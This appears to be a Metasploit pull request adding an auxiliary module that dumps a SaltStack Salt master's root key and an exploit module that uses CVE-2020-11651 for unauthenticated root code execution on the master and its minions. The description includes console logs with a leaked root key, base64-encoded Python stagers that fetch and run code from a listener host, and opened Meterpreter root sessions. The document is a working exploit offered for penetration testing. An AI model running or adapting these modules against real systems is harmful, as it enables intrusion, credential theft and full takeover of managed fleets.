+          ['CVE', '2020-11652'], # Authed directory traversals (not used here)
+          ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],
+          ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],
+          ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']
+        ],
+        'DisclosureDate' => '2020-04-30', # F-Secure advisory
+        'License' => MSF_LICENSE,
+        'Actions' => [
+          ['Dump', 'Description' => 'Dump root key from Salt master']
+        ],
+        'DefaultAction' => 'Dump',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(4506)
+    ])
+  end
+
+  def run
+    # These are from Msf::Exploit::Remote::ZeroMQ
+    zmq_connect
+    zmq_negotiate
+
+    unless (root_key = extract_root_key(yeet_prep_auth_info))
+      print_error('Could not find root key in serialized auth info')
+
+      # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
+      return Exploit::CheckCode::Safe
+    end
+
+    print_good("Root key: #{root_key}")
+
+    # I hate this API, but store the root key in creds, too
+    create_credential_and_login(
+      workspace_id: myworkspace_id,
+      module_fullname: fullname,
+      origin_type: :service,
+      address: rhost,
+      port: rport,
+      protocol: 'tcp',
+      service_name: 'salt/zeromq',
+      username: 'root',
+      private_data: root_key,
+      private_type: :password
+    )
+
+    # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce
+    Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!
+  rescue EOFError, Rex::ConnectionError => e
+    print_error("#{e.class}: #{e.message}")
+  ensure
+    # This is from Msf::Exploit::Remote::ZeroMQ
+    zmq_disconnect
+  end
+
+  def yeet_prep_auth_info
+    print_status("Yeeting _prep_auth_info() at #{peer}")
+
+    zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive auth info')
+    end
+
+    unless res.match(/user.+UserAuthenticationError.+root/m)
+      fail_with(Failure::UnexpectedReply,
+                "Did not receive serialized auth info: #{res.inspect}")
+    end
+
+    vprint_good('Received serialized auth info')
+
+    # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack "load"
+    res[4..-1]
+  end
+
+  def extract_root_key(auth_info)
+    # Fetch root key from appropriate index of deserialized data, presumably
+    MessagePack.unpack(auth_info)[2]&.fetch('root')
+  rescue EOFError, KeyError, MessagePack::MalformedFormatError => e
+    print_error("#{__method__} failed: #{e.message}")
+    nil
+  end
+
+end

--- a/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
+++ b/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
@@ -1,0 +1,267 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::ZeroMQ
+  include Msf::Exploit::Remote::CheckModule
+  include Msf::Exploit::CmdStager::HTTP # HACK: This is a mixin of a mixin
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SaltStack Salt Master/Minion Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits unauthenticated access to the runner() and
+          _send_pub() methods in the SaltStack Salt master's ZeroMQ request
+          server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to
+          execute code as root on either the master or on select minions.
+
+          Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
+          well as Vulhub's Docker image.
+        },
+        'Author' => [
+          'F-Secure', # Discovery
+          'wvu' # Module
+        ],
+        'References' => [
+          ['CVE', '2020-11651'], # Auth bypass (used by this module)
+          ['CVE', '2020-11652'], # Authed directory traversals (not used here)
+          ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],
+          ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],
+          ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']
+        ],
+        'DisclosureDate' => '2020-04-30', # F-Secure advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['python', 'unix'],
+        'Arch' => [ARCH_PYTHON, ARCH_CMD],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Master (Python payload)',
+            'Description' => 'Executing Python payload on the master',
+            'Type' => :python,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'python/meterpreter/reverse_https'
+            }
+          ],
+          [
+            'Master (Unix command)',
+            'Description' => 'Executing Unix command on the master',
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
+            }
+          ],
+          [
+            'Minions (Python payload)',
+            'Description' => 'Executing Python payload on the minions',
+            'Type' => :python,
+            'DefaultOptions' => {
+              'PAYLOAD' => 'python/meterpreter/reverse_https'
+            }
+          ],
+          [
+            'Minions (Unix command)',
+            'Description' => 'Executing Unix command on the minions',
+            'Type' => :unix_command,
+            'DefaultOptions' => {
+              # cmd/unix/reverse_python_ssl crashes in this target
+              'PAYLOAD' => 'cmd/unix/reverse_python'
+            }
+          ]
+        ],
+        'DefaultTarget' => 0, # Defaults to master for safety
+        'DefaultOptions' => {
+          'CheckModule' => 'auxiliary/gather/saltstack_salt_root_key'
+        },
+        'Notes' => {
+          'Stability' => [SERVICE_RESOURCE_LOSS], # May hang up the service
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT(4506),
+      OptRegexp.new('MINIONS', [true, 'PCRE regex of minions to target', /.*/])
+    ])
+
+    register_advanced_options([
+      OptInt.new('WfsDelay', [true, 'Seconds to wait for *all* sessions', 10])
+    ])
+
+    # XXX: https://github.com/rapid7/metasploit-framework/issues/12963
+    import_target_defaults
+  end
+
+  def exploit
+    # check.reason is from auxiliary/gather/saltstack_salt_root_key
+    if target.name.start_with?('Master')
+      unless (root_key = check.reason)
+        fail_with(Failure::BadConfig,
+                  "#{target['Description']} requires a root key")
+      end
+
+      print_good("Successfully obtained root key: #{root_key}")
+    end
+
+    # These are from Msf::Exploit::Remote::ZeroMQ
+    zmq_connect
+    zmq_negotiate
+
+    print_status("#{target['Description']}: #{datastore['PAYLOAD']}")
+
+    case target.name
+    when /^Master/
+      yeet_runner(root_key)
+    when /^Minions/
+      yeet_send_pub
+    end
+
+    # HACK: Hijack WfsDelay to wait for _all_ sessions, not just the first one
+    sleep(wfs_delay)
+  rescue EOFError, Rex::ConnectionError => e
+    print_error("#{e.class}: #{e.message}")
+  ensure
+    # This is from Msf::Exploit::Remote::ZeroMQ
+    zmq_disconnect
+  end
+
+  def yeet_runner(root_key)
+    print_status("Yeeting runner() at #{peer}")
+
+    # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L1898-L1951
+    # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L1898-L1951
+    runner = {
+      'cmd' => 'runner',
+      # https://docs.saltstack.com/en/master/ref/runners/all/salt.runners.salt.html#salt.runners.salt.cmd
+      'fun' => 'salt.cmd',
+      'kwarg' => {
+        'hide_output' => true,
+        'ignore_retcode' => true,
+        'output_loglevel' => 'quiet'
+      },
+      'user' => 'root', # This is NOT the Unix user!
+      'key' => root_key # No JID needed, only the root key!
+    }
+
+    case target['Type']
+    when :python
+      vprint_status("Executing Python code: #{payload.encoded}")
+
+      # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code
+      runner['kwarg'].merge!(
+        'fun' => 'cmd.exec_code',
+        'lang' => payload.arch.first,
+        'code' => payload.encoded
+      )
+    when :unix_command
+      # HTTPS doesn't appear to be supported by the server :(
+      print_status("Serving intermediate stager over HTTP: #{start_service}")
+
+      vprint_status("Executing Unix command: #{payload.encoded}")
+
+      # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.script
+      runner['kwarg'].merge!(
+        # cmd.run doesn't work due to a missing argument error, so we use this
+        'fun' => 'cmd.script',
+        'source' => get_uri,
+        'stdin' => payload.encoded
+      )
+    end
+
+    vprint_status("Unserialized clear load: #{runner}")
+    zmq_send_message(serialize_clear_load(runner))
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive runner() response')
+    end
+
+    vprint_good("Received runner() response: #{res.inspect}")
+  end
+
+  def yeet_send_pub
+    print_status("Yeeting _send_pub() at #{peer}")
+
+    # NOTE: A unique JID (job ID) is needed for every published job
+    jid = generate_jid
+
+    # https://github.com/saltstack/salt/blob/v2019.2.3/salt/master.py#L2043-L2151
+    # https://github.com/saltstack/salt/blob/v3000.1/salt/master.py#L2043-L2151
+    send_pub = {
+      'cmd' => '_send_pub',
+      'kwargs' => {
+        'bg' => true,
+        'hide_output' => true,
+        'ignore_retcode' => true,
+        'output_loglevel' => 'quiet',
+        'show_jid' => false,
+        'show_timeout' => false
+      },
+      'user' => 'root', # This is NOT the Unix user!
+      'tgt' => datastore['MINIONS'].source,
+      'tgt_type' => 'pcre',
+      'jid' => jid
+    }
+
+    case target['Type']
+    when :python
+      vprint_status("Executing Python code: #{payload.encoded}")
+
+      # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.exec_code
+      send_pub.merge!(
+        'fun' => 'cmd.exec_code',
+        'arg' => [payload.arch.first, payload.encoded]
+      )
+    when :unix_command
+      vprint_status("Executing Unix command: #{payload.encoded}")
+
+      # https://docs.saltstack.com/en/master/ref/modules/all/salt.modules.cmdmod.html#salt.modules.cmdmod.run
+      send_pub.merge!(
+        'fun' => 'cmd.run',
+        'arg' => [payload.encoded]
+      )
+    end
+
+    vprint_status("Unserialized clear load: #{send_pub}")
+    zmq_send_message(serialize_clear_load(send_pub))
+
+    unless (res = sock.get_once)
+      fail_with(Failure::Unknown, 'Did not receive _send_pub() response')
+    end
+
+    vprint_good("Received _send_pub() response: #{res.inspect}")
+
+    # NOTE: This path will likely change between platforms and distros
+    register_file_for_cleanup("/var/cache/salt/minion/proc/#{jid}")
+  end
+
+  # https://github.com/saltstack/salt/blob/v2019.2.3/salt/utils/jid.py
+  # https://github.com/saltstack/salt/blob/v3000.1/salt/utils/jid.py
+  def generate_jid
+    DateTime.now.new_offset.strftime('%Y%m%d%H%M%S%6N')
+  end
+
+  # HACK: Stub out the command stager used by Msf::Exploit::CmdStager::HTTP
+  def stager_instance
+    nil
+  end
+
+  # HACK: Sub out the executable used by Msf::Exploit::CmdStager::HTTP
+  def exe
+    # NOTE: The shebang line is necessary in this case!
+    <<~SHELL
+      #!/bin/sh
+      /bin/sh
+    SHELL
+  end
+
+end

--- a/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
+++ b/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
@@ -23,6 +23,9 @@ class MetasploitModule < Msf::Exploit::Remote
           server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to
           execute code as root on either the master or on select minions.
 
+          VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are
+          known to be affected by the Salt vulnerabilities.
+
           Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as
           well as Vulhub's Docker image.
         },
@@ -35,6 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-11652'], # Authed directory traversals (not used here)
           ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],
           ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],
           ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']
         ],
         'DisclosureDate' => '2020-04-30', # F-Secure advisory

--- a/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
+++ b/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
@@ -106,6 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
     import_target_defaults
   end
 
+  # NOTE: check is provided by auxiliary/gather/saltstack_salt_root_key
+
   def exploit
     # check.reason is from auxiliary/gather/saltstack_salt_root_key
     if target.name.start_with?('Master')


### PR DESCRIPTION
# ✅ Feature-complete now

There is one other target I'm interested in testing, but it's not essential.

## Background

Please read [F-Secure's advisory](https://labs.f-secure.com/advisories/saltstack-authorization-bypass) and [SaltStack's blog post](https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/) on the vulnerabilities.

Only [CVE-2020-11651](https://nvd.nist.gov/vuln/detail/CVE-2020-11651) is used by the modules in this PR.

## Features

`auxiliary/gather/saltstack_salt_root_key` supports retrieving the Salt master's root key.

`exploit/linux/misc/saltstack_salt_unauth_rce` supports RCE on the master itself and on any minions it manages. **It will use `auxiliary/gather/saltstack_salt_root_key` as its `check` method.**

## Testing

The easiest way to get up and running is to use [Vulhub's Docker image](https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-11651).

## Examples

### auxiliary/gather/saltstack_salt_root_key

```
msf5 auxiliary(gather/saltstack_salt_root_key) > run
[*] Running module against 172.28.128.5

[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Negotiating signature
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
[*] 172.28.128.5:4506 - Sending identical signature
[*] 172.28.128.5:4506 - Negotiating version
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
[*] 172.28.128.5:4506 - Sending identical version
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
[+] 172.28.128.5:4506 - Received NULL security mechanism
[*] 172.28.128.5:4506 - Sending NULL security mechanism
[*] 172.28.128.5:4506 - Sending READY command of type REQ
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
[+] 172.28.128.5:4506 - Received serialized auth info
[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
[*] Auxiliary module execution completed
msf5 auxiliary(gather/saltstack_salt_root_key) >
```

### exploit/linux/misc/saltstack_salt_unauth_rce

#### Executing Python payload on the master

```
msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run

[*] Started HTTPS reverse handler on https://172.28.128.1:8443
[*] 172.28.128.5:4506 - Using auxiliary/gather/saltstack_salt_root_key as check
[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Negotiating signature
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
[*] 172.28.128.5:4506 - Sending identical signature
[*] 172.28.128.5:4506 - Negotiating version
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
[*] 172.28.128.5:4506 - Sending identical version
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
[+] 172.28.128.5:4506 - Received NULL security mechanism
[*] 172.28.128.5:4506 - Sending NULL security mechanism
[*] 172.28.128.5:4506 - Sending READY command of type REQ
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
[*] 172.28.128.5:4506 - Yeeting _prep_auth_info() at 172.28.128.5:4506
[+] 172.28.128.5:4506 - Received serialized auth info
[+] 172.28.128.5:4506 - Root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506
[+] 172.28.128.5:4506 - Successfully obtained root key: bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk=
[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Negotiating signature
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
[*] 172.28.128.5:4506 - Sending identical signature
[*] 172.28.128.5:4506 - Negotiating version
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
[*] 172.28.128.5:4506 - Sending identical version
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
[+] 172.28.128.5:4506 - Received NULL security mechanism
[*] 172.28.128.5:4506 - Sending NULL security mechanism
[*] 172.28.128.5:4506 - Sending READY command of type REQ
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
[*] 172.28.128.5:4506 - Executing Python payload on the master: python/meterpreter/reverse_https
[*] 172.28.128.5:4506 - Yeeting runner() at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Executing Python code: exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My96a0p4ZWdUdlhWeUtGcDhDMUtGZmpnTFNKOXNvcycpLnJlYWQoKSkK')[0]))
[*] 172.28.128.5:4506 - Unserialized clear load: {"cmd"=>"runner", "fun"=>"salt.cmd", "kwarg"=>{"hide_output"=>true, "ignore_retcode"=>true, "output_loglevel"=>"quiet", "fun"=>"cmd.exec_code", "lang"=>"python", "code"=>"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My96a0p4ZWdUdlhWeUtGcDhDMUtGZmpnTFNKOXNvcycpLnJlYWQoKSkK')[0]))"}, "user"=>"root", "key"=>"bv2Ra72DXzkrbFVYNPHrOe9CqM2aKBdl+E46/m/kaxvDsiLxhG+0PS55u704MyOi2/PgD/EadGk="}
[+] 172.28.128.5:4506 - Received runner() response: "\x01\x00\x00<\x82\xA3jid\xB420200510102113141303\xA3tag\xBDsalt/run/20200510102113141303"
[*] https://172.28.128.1:8443 handling request from 172.28.128.5; (UUID: kwpadl1s) Staging python payload (53902 bytes) ...
[*] Meterpreter session 1 opened (172.28.128.1:8443 -> 172.28.128.5:48236) at 2020-05-10 05:21:15 -0500
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu-bionic
OS              : Linux 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter >
```

#### Executing Python payload on the minions

```
msf5 exploit(linux/misc/saltstack_salt_unauth_rce) > run

[*] Started HTTPS reverse handler on https://172.28.128.1:8443
[*] 172.28.128.5:4506 - Connecting to ZeroMQ service at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Negotiating signature
[+] 172.28.128.5:4506 - Received valid signature: "\xFF\x00\x00\x00\x00\x00\x00\x00\x01\x7F"
[*] 172.28.128.5:4506 - Sending identical signature
[*] 172.28.128.5:4506 - Negotiating version
[+] 172.28.128.5:4506 - Received compatible version: "\x03"
[*] 172.28.128.5:4506 - Sending identical version
[*] 172.28.128.5:4506 - Negotiating NULL security mechanism
[+] 172.28.128.5:4506 - Received NULL security mechanism
[*] 172.28.128.5:4506 - Sending NULL security mechanism
[*] 172.28.128.5:4506 - Sending READY command of type REQ
[+] 172.28.128.5:4506 - Received READY reply of type ROUTER
[*] 172.28.128.5:4506 - Executing Python payload on the minions: python/meterpreter/reverse_https
[*] 172.28.128.5:4506 - Yeeting _send_pub() at 172.28.128.5:4506
[*] 172.28.128.5:4506 - Executing Python code: exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My9hZEY5X2gxZFJrZ3BSRHhRZF9QOC1nc1V6a1hmcycpLnJlYWQoKSkK')[0]))
[*] 172.28.128.5:4506 - Unserialized clear load: {"cmd"=>"_send_pub", "kwargs"=>{"bg"=>true, "hide_output"=>true, "ignore_retcode"=>true, "output_loglevel"=>"quiet", "show_jid"=>false, "show_timeout"=>false}, "user"=>"root", "tgt"=>".*", "tgt_type"=>"pcre", "jid"=>"20200510102150723893", "fun"=>"cmd.exec_code", "arg"=>["python", "exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMjguMTI4LjE6ODQ0My9hZEY5X2gxZFJrZ3BSRHhRZF9QOC1nc1V6a1hmcycpLnJlYWQoKSkK')[0]))"]}
[+] 172.28.128.5:4506 - Received _send_pub() response: "\x01\x00\x00\x01\xC0"
[*] https://172.28.128.1:8443 handling request from 172.28.128.5; (UUID: foe5rluh) Staging python payload (53883 bytes) ...
[*] Meterpreter session 2 opened (172.28.128.1:8443 -> 172.28.128.5:48388) at 2020-05-10 05:21:51 -0500
[+] 172.28.128.5:4506 - Deleted /var/cache/salt/minion/proc/20200510102150723893
[*] 172.28.128.5:4506 - Disconnecting from 172.28.128.5:4506

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu-bionic
OS              : Linux 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter >
```